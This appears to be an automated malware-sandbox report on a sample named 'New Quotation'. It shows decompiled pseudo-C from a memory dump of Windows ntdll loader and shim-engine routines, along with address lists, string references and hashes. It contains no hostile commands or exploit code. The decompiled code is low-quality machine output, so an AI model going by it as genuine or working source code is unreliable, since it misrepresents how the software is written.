							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t108 + 0x14)));
						}
					}
					goto L6;
				}
			}









































                                                                                                                                                                                          0x1d7c6415
                                                                                                                                                                                          0x1d7c6422
                                                                                                                                                                                          0x1d7c642e
                                                                                                                                                                                          0x1d7c642f
                                                                                                                                                                                          0x1d7c6434
                                                                                                                                                                                          0x1d7c643a
                                                                                                                                                                                          0x1d7c643b
                                                                                                                                                                                          0x1d7c6440
                                                                                                                                                                                          0x1d7c6446
                                                                                                                                                                                          0x1d7c644e
                                                                                                                                                                                          0x1d7c6458
                                                                                                                                                                                          0x1d7c6460
                                                                                                                                                                                          0x1d7c6465
                                                                                                                                                                                          0x1d7c646c
                                                                                                                                                                                          0x1d829770
                                                                                                                                                                                          0x1d829776
                                                                                                                                                                                          0x1d829779
                                                                                                                                                                                          0x1d8297b3
                                                                                                                                                                                          0x1d8297b3
                                                                                                                                                                                          0x1d8297dd
                                                                                                                                                                                          0x1d8297dd
                                                                                                                                                                                          0x1d8297e3
                                                                                                                                                                                          0x1d8297e3
                                                                                                                                                                                          0x1d7c6542
                                                                                                                                                                                          0x1d7c6542
                                                                                                                                                                                          0x1d7c654a
                                                                                                                                                                                          0x1d82982b
                                                                                                                                                                                          0x1d82982b
                                                                                                                                                                                          0x1d7c6557
                                                                                                                                                                                          0x1d7c6558
                                                                                                                                                                                          0x1d7c6559
                                                                                                                                                                                          0x1d7c6564
                                                                                                                                                                                          0x1d7c6564
                                                                                                                                                                                          0x1d82977b
                                                                                                                                                                                          0x1d82977c
                                                                                                                                                                                          0x1d829781
                                                                                                                                                                                          0x1d829783
                                                                                                                                                                                          0x1d829788
                                                                                                                                                                                          0x1d8297a0
                                                                                                                                                                                          0x1d8297a0
                                                                                                                                                                                          0x1d8297a5
                                                                                                                                                                                          0x1d8297aa
                                                                                                                                                                                          0x1d8297b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8297b0
                                                                                                                                                                                          0x1d7c647e
                                                                                                                                                                                          0x1d7c648b
                                                                                                                                                                                          0x1d7c6498
                                                                                                                                                                                          0x1d7c649e
                                                                                                                                                                                          0x1d8297ed
                                                                                                                                                                                          0x1d8297ed
                                                                                                                                                                                          0x1d7c64a4
                                                                                                                                                                                          0x1d7c64a6
                                                                                                                                                                                          0x1d8297f7
                                                                                                                                                                                          0x1d8297fc
                                                                                                                                                                                          0x1d8297fe
                                                                                                                                                                                          0x1d8297ce
                                                                                                                                                                                          0x1d8297d3
                                                                                                                                                                                          0x1d8297d8
                                                                                                                                                                                          0x1d8297d8
                                                                                                                                                                                          0x1d8297db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c64ac
                                                                                                                                                                                          0x1d7c64b0
                                                                                                                                                                                          0x1d7c64be
                                                                                                                                                                                          0x1d7c64c3
                                                                                                                                                                                          0x1d7c64cc
                                                                                                                                                                                          0x1d7c64d1
                                                                                                                                                                                          0x1d7c64d8
                                                                                                                                                                                          0x1d829802
                                                                                                                                                                                          0x1d829808
                                                                                                                                                                                          0x1d82980b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82978f
                                                                                                                                                                                          0x1d829790
                                                                                                                                                                                          0x1d829795
                                                                                                                                                                                          0x1d829796
                                                                                                                                                                                          0x1d82979b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82979b
                                                                                                                                                                                          0x1d7c64de
                                                                                                                                                                                          0x1d7c64eb
                                                                                                                                                                                          0x1d7c64f1
                                                                                                                                                                                          0x1d7c64f9
                                                                                                                                                                                          0x1d7c6507
                                                                                                                                                                                          0x1d7c6510
                                                                                                                                                                                          0x1d7c651c
                                                                                                                                                                                          0x1d7c6526
                                                                                                                                                                                          0x1d7c652c
                                                                                                                                                                                          0x1d7c653c
                                                                                                                                                                                          0x1d82981d
                                                                                                                                                                                          0x1d82981d
                                                                                                                                                                                          0x1d7c653c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7c6526

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 1D7C651C
                                                                                                                                                                                            • Part of subcall function 1D7C6565: RtlDebugPrintTimes.NTDLL ref: 1D7C6614
                                                                                                                                                                                            • Part of subcall function 1D7C6565: RtlDebugPrintTimes.NTDLL ref: 1D7C665F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1D829790
                                                                                                                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1D82977C
                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1D8297A0, 1D8297C9
                                                                                                                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1D8297B9
                                                                                                                                                                                          • LdrpInitShimEngine, xrefs: 1D829783, 1D829796, 1D8297BF
                                                                                                                                                                                          • apphelp.dll, xrefs: 1D7C6446
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 3446177414-204845295
                                                                                                                                                                                          • Opcode ID: 55a2fd3377bd624e197cb2f417b4219a4bcbf191e9c1511424a5affacd71a525
                                                                                                                                                                                          • Instruction ID: 2ca8c70b25f997e2c5bc56d39329461143c7a7c8dd24b5d896700408dd90b78a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 55a2fd3377bd624e197cb2f417b4219a4bcbf191e9c1511424a5affacd71a525
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1151EDB0248301DFD310DF24D8D4BAA77E8FF847A4F50492AF6959B1A0DA30EA40CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D84FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 17%
                                                                                                                                                                                          			E1D84FA02(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				signed char _t50;
				intOrPtr _t51;
				intOrPtr _t66;
				intOrPtr _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				char* _t77;

				_t74 = __edx;
				_v20 = __ecx;
				_t66 = 0;
				_v12 =  *((intOrPtr*)(__ecx + 0x18)) +  *((intOrPtr*)(_a4 + 4));
				E1D84F899(__ecx, _a4, _a16,  &_v16,  &_v8);
				_t50 =  *0x1d8c37c0; // 0x0
				_t77 = _v16;
				if((_t50 & 0x00000003) != 0) {
					_t71 = _t77;
					if(_t77 == 0) {
						_t71 = "Unknown";
					}
					_push(_a20);
					_push(_v20 + 0x2c);
					_push(_v8);
					_push(_t71);
					E1D84E692("minkernel\\ntdll\\ldrdload.c", 0x1cc, "LdrpRedirectDelayloadFailure", _t66, "Failed to find export %s!%s (Ordinal:%d) in \"%wZ\"  0x%08lx\n", _v12);
					_t50 =  *0x1d8c37c0; // 0x0
				}
				if((_t50 & 0x00000010) != 0) {
					asm("int3");
				}
				if(_t74 == 0) {
					_t68 = _t66;
					goto L11;
				} else {
					_t68 =  *((intOrPtr*)(_t74 + 0x18));
					if(( *0x1d8c391c & 0x00000010) != 0 || ( *(_t74 + 0x34) & 0x00000001) != 0) {
						L11:
						_t51 = 1;
						goto L12;
					} else {
						_t51 = _t66;
						L12:
						_t75 = _a8;
						if(_t75 == 0 || _t51 == 0) {
							L18:
							_t76 = _a12;
							if(_t76 != 0) {
								if(_t77 == 0) {
									_t77 = _v8;
								}
								 *0x1d8c91e0(_v12, _t77);
								_t66 =  *_t76();
							}
							goto L22;
						} else {
							_v52 = _a4;
							_v48 = _a16;
							_v28 = _t66;
							_v56 = 0x24;
							_v44 = _v12;
							_v32 = _t68;
							_v24 = E1D806010(_a20);
							if(_t77 == 0) {
								_v40 = _t66;
								_v36 = _v8;
							} else {
								_v40 = 1;
								_v36 = _t77;
							}
							 *0x1d8c91e0("true",  &_v56);
							_t66 =  *_t75();
							if(_t66 != 0) {
								L22:
								return _t66;
							} else {
								goto L18;
							}
						}
					}
				}
			}

























                                                                                                                                                                                          0x1d84fa10
                                                                                                                                                                                          0x1d84fa12
                                                                                                                                                                                          0x1d84fa18
                                                                                                                                                                                          0x1d84fa1d
                                                                                                                                                                                          0x1d84fa2b
                                                                                                                                                                                          0x1d84fa30
                                                                                                                                                                                          0x1d84fa35
                                                                                                                                                                                          0x1d84fa3a
                                                                                                                                                                                          0x1d84fa3c
                                                                                                                                                                                          0x1d84fa40
                                                                                                                                                                                          0x1d84fa42
                                                                                                                                                                                          0x1d84fa42
                                                                                                                                                                                          0x1d84fa47
                                                                                                                                                                                          0x1d84fa50
                                                                                                                                                                                          0x1d84fa51
                                                                                                                                                                                          0x1d84fa54
                                                                                                                                                                                          0x1d84fa6d
                                                                                                                                                                                          0x1d84fa72
                                                                                                                                                                                          0x1d84fa77
                                                                                                                                                                                          0x1d84fa7c
                                                                                                                                                                                          0x1d84fa7e
                                                                                                                                                                                          0x1d84fa7e
                                                                                                                                                                                          0x1d84fa81
                                                                                                                                                                                          0x1d84fa99
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84fa83
                                                                                                                                                                                          0x1d84fa8a
                                                                                                                                                                                          0x1d84fa8d
                                                                                                                                                                                          0x1d84fa9b
                                                                                                                                                                                          0x1d84fa9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84fa95
                                                                                                                                                                                          0x1d84fa95
                                                                                                                                                                                          0x1d84fa9d
                                                                                                                                                                                          0x1d84fa9d
                                                                                                                                                                                          0x1d84faa2
                                                                                                                                                                                          0x1d84fb01
                                                                                                                                                                                          0x1d84fb01
                                                                                                                                                                                          0x1d84fb06
                                                                                                                                                                                          0x1d84fb0a
                                                                                                                                                                                          0x1d84fb0c
                                                                                                                                                                                          0x1d84fb0c
                                                                                                                                                                                          0x1d84fb15
                                                                                                                                                                                          0x1d84fb1d
                                                                                                                                                                                          0x1d84fb1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84faa8
                                                                                                                                                                                          0x1d84faae
                                                                                                                                                                                          0x1d84fab4
                                                                                                                                                                                          0x1d84faba
                                                                                                                                                                                          0x1d84fabd
                                                                                                                                                                                          0x1d84fac4
                                                                                                                                                                                          0x1d84fac7
                                                                                                                                                                                          0x1d84facf
                                                                                                                                                                                          0x1d84fad4
                                                                                                                                                                                          0x1d84fae5
                                                                                                                                                                                          0x1d84fae8
                                                                                                                                                                                          0x1d84fad6
                                                                                                                                                                                          0x1d84fad6
                                                                                                                                                                                          0x1d84fadd
                                                                                                                                                                                          0x1d84fadd
                                                                                                                                                                                          0x1d84faf3
                                                                                                                                                                                          0x1d84fafb
                                                                                                                                                                                          0x1d84faff
                                                                                                                                                                                          0x1d84fb21
                                                                                                                                                                                          0x1d84fb25
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84faff
                                                                                                                                                                                          0x1d84faa2
                                                                                                                                                                                          0x1d84fa8d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                          • API String ID: 3446177414-4227709934
                                                                                                                                                                                          • Opcode ID: 050dc392b25fc037ae83eb526a9d8a24988ef75641a3d8c8cdbb1ed0ae7ba3ad
                                                                                                                                                                                          • Instruction ID: 8e81f3d5fe0ab918a723feabb34e71aa3ffcf89d7628c5b91d5a12467751c57d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 050dc392b25fc037ae83eb526a9d8a24988ef75641a3d8c8cdbb1ed0ae7ba3ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 62415276A0121DAFCB01DF99C988BEEBBB5FF88358F218159F904A7340D7719A01CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7D9046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E1D7D9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x1d8abe98);
				E1D827C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E1D818F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E1D7E9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x1d8c65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E1D7EA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E1D7F5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E1D7F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x1d8c65e0; // 0x7537a680
							 *0x1d8c91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x1d8c65e8; // 0x764c7740
									if(_t148 != 0) {
										 *0x1d8c91e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E1D7EDC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E1D7E3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E1D7E9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E1D83247B();
									goto L26;
								} else {
									_t152 = E1D7EA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E1D7F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                                                                                                                                                          0x1d7d9046
                                                                                                                                                                                          0x1d7d9046
                                                                                                                                                                                          0x1d7d904b
                                                                                                                                                                                          0x1d7d9050
                                                                                                                                                                                          0x1d7d9055
                                                                                                                                                                                          0x1d7d905b
                                                                                                                                                                                          0x1d7d905d
                                                                                                                                                                                          0x1d7d9066
                                                                                                                                                                                          0x1d7d906f
                                                                                                                                                                                          0x1d7d9078
                                                                                                                                                                                          0x1d7d9080
                                                                                                                                                                                          0x1d7d9088
                                                                                                                                                                                          0x1d7d908f
                                                                                                                                                                                          0x1d7d9095
                                                                                                                                                                                          0x1d7d90a9
                                                                                                                                                                                          0x1d7d90b1
                                                                                                                                                                                          0x1d7d90be
                                                                                                                                                                                          0x1d7d90c6
                                                                                                                                                                                          0x1d7d90cf
                                                                                                                                                                                          0x1d7d90e2
                                                                                                                                                                                          0x1d7d90f7
                                                                                                                                                                                          0x1d7d90fb
                                                                                                                                                                                          0x1d7d9118
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d9123
                                                                                                                                                                                          0x1d7d913b
                                                                                                                                                                                          0x1d7d913f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d9147
                                                                                                                                                                                          0x1d83231f
                                                                                                                                                                                          0x1d83231f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83231f
                                                                                                                                                                                          0x1d7d9154
                                                                                                                                                                                          0x1d832330
                                                                                                                                                                                          0x1d832336
                                                                                                                                                                                          0x1d832336
                                                                                                                                                                                          0x1d7d915a
                                                                                                                                                                                          0x1d7d915a
                                                                                                                                                                                          0x1d7d915a
                                                                                                                                                                                          0x1d7d9161
                                                                                                                                                                                          0x1d7d9167
                                                                                                                                                                                          0x1d7d916b
                                                                                                                                                                                          0x1d7d9172
                                                                                                                                                                                          0x1d7d9182
                                                                                                                                                                                          0x1d7d918e
                                                                                                                                                                                          0x1d7d9199
                                                                                                                                                                                          0x1d7d91ba
                                                                                                                                                                                          0x1d7d91be
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d91e0
                                                                                                                                                                                          0x1d832358
                                                                                                                                                                                          0x1d832360
                                                                                                                                                                                          0x1d832368
                                                                                                                                                                                          0x1d83236a
                                                                                                                                                                                          0x1d832372
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832378
                                                                                                                                                                                          0x1d832378
                                                                                                                                                                                          0x1d832381
                                                                                                                                                                                          0x1d832458
                                                                                                                                                                                          0x1d832458
                                                                                                                                                                                          0x1d83245b
                                                                                                                                                                                          0x1d832463
                                                                                                                                                                                          0x1d832468
                                                                                                                                                                                          0x1d83246e
                                                                                                                                                                                          0x1d83246e
                                                                                                                                                                                          0x1d8324a7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8324a7
                                                                                                                                                                                          0x1d83238f
                                                                                                                                                                                          0x1d832396
                                                                                                                                                                                          0x1d83239c
                                                                                                                                                                                          0x1d83239f
                                                                                                                                                                                          0x1d83239f
                                                                                                                                                                                          0x1d8323bb
                                                                                                                                                                                          0x1d8323c8
                                                                                                                                                                                          0x1d8323ca
                                                                                                                                                                                          0x1d8323d2
                                                                                                                                                                                          0x1d83244c
                                                                                                                                                                                          0x1d83244c
                                                                                                                                                                                          0x1d832453
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8323d4
                                                                                                                                                                                          0x1d8323e7
                                                                                                                                                                                          0x1d8323e9
                                                                                                                                                                                          0x1d8323f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8323f9
                                                                                                                                                                                          0x1d832402
                                                                                                                                                                                          0x1d832408
                                                                                                                                                                                          0x1d83240c
                                                                                                                                                                                          0x1d832413
                                                                                                                                                                                          0x1d832423
                                                                                                                                                                                          0x1d83243f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832441
                                                                                                                                                                                          0x1d832446
                                                                                                                                                                                          0x1d832446
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832446
                                                                                                                                                                                          0x1d8323fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8323fb
                                                                                                                                                                                          0x1d8323d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d832372
                                                                                                                                                                                          0x1d7d91be
                                                                                                                                                                                          0x1d7d9118
                                                                                                                                                                                          0x1d7d90fd
                                                                                                                                                                                          0x1d7d9102
                                                                                                                                                                                          0x1d7d910e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: $$@$@wLv
                                                                                                                                                                                          • API String ID: 3446177414-938860298
                                                                                                                                                                                          • Opcode ID: edf302b599f7d50cd553a3123d2eee9fdc612bf3da3317579c70083b775e1f39
                                                                                                                                                                                          • Instruction ID: 54a48adf9260cb7e732b257a0f05578fcf82192ce9e0c8142b873213fb207135
                                                                                                                                                                                          • Opcode Fuzzy Hash: edf302b599f7d50cd553a3123d2eee9fdc612bf3da3317579c70083b775e1f39
                                                                                                                                                                                          • Instruction Fuzzy Hash: E6811C75D002699BDB21CF54CC85BEEB6B8AF09750F0141EAE91DB7250E7709E84CFA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                          			E1D7C6565(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x1d8cb370 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E1D7EE8A6(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x1d8c9200; // 0x0
				_t113 = 0x20;
				 *0x1d8c65f8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E1D7FE7E0(_t92, _v92);
					}
					_t114 =  *0x1d8c9210; // 0x0
					asm("ror esi, cl");
					 *0x1d8c91e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x1d8c9218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E1D7DFED0(0x1d8c32d8);
					_t98 = 0x1d8c5d8c;
					if( *0x1d8c65f0 != 0) {
						_t56 =  *0x1d8c5d8c; // 0x18e2b68
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x1d8c5d8c; // 0x18e2b68
						if( *0x1d8c65f4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x1d8c65f0 = 1;
							 *0x1d8c65f8 = 0;
							E1D7DE740(_t98);
							E1D7C676F(_t98);
							return E1D814B50(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116, 0x1d8c32d8);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x18e2b30
								_t98 =  *_t24;
								E1D7C6704( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x1d8c5d8c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E1D815050(_t92,  &_v108, _t110);
					_t92 = E1D7C6B45( &_v108,  &_v92, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x1d8c37c0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x8ef, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x1d8c37c0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E1D807DF6(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x1d8c91e0( *((intOrPtr*)(_t76 + 0x18)));
